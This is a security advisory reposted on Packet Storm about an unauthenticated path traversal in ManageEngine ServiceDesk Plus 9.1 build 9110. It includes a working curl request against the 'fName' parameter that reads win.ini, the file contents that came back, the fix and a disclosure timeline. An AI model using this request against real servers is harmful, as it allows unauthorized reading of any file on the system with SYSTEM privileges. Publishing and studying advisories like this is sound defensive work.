Twenty Year Anniversary

ManageEngine ServiceDesk Plus 9.1 Build 9110 Path Traversal

ManageEngine ServiceDesk Plus 9.1 Build 9110 Path Traversal
Posted Oct 6, 2015
Authored by xistence

ManageEngine ServiceDesk Plus versions 9.1 build 9110 and below suffer from a path traversal vulnerability.

tags | exploit, file inclusion
MD5 | dacb14eb812464766d3272d40a123e3c

ManageEngine ServiceDesk Plus 9.1 Build 9110 Path Traversal

Change Mirror Download
Exploit Title: ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path
Traversal
Product: ManageEngine ServiceDesk Plus
Vulnerable Versions: 9.1 build 9110 and previous versions
Tested Version: 9.1 build 9110 (Windows)
Advisory Publication: 03/10/2015
Vulnerability Type: Unauthenticated Path Traversal
Credit: xistence <xistence[at]0x90.nl>

Product Description
-------------------

ServiceDesk Plus is an ITIL ready IT help desk software for organizations
of all sizes. With advanced ITSM functionality and easy-to-use capability,
ServiceDesk Plus helps IT support teams deliver world-class services to end
users with reduced costs and complexity. Over 100,000 organizations across
185 countries trust ServiceDesk Plus to optimize IT service desk
performance and achieve high user satisfaction.


Vulnerability Details
---------------------

The "fName" parameter is vulnerable to path traversal without the need for
any authentication.
On Windows environments, downloading files will be done with SYSTEM
privileges. This makes it possible to download any file on the filesystem.

The following example will download the "win.ini" file:

$ curl "
http://192.168.2.129:8080/workorder/FileDownload.jsp?module=support&fName=..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo


Solution
--------

Upgrade to ServiceDesk 9.1 build 9111.


Advisory Timeline
-----------------

07/10/2015 - Discovery and vendor notification
07/10/2015 - ManageEngine responsed that they will notify their development
team
09/13/2015 - No response from vendor yet, asked for status update
09/24/2015 - ManageEngine responded that they've fixed the issue and
assigned issue ID: SD-60283
09/28/2015 - Fixed ServiceDesk Plus version 9.1 build 9111 has been released
10/03/2015 - Public disclosure

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    8 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    32 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    2 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    15 Files
  • 21
    Jun 21st
    15 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close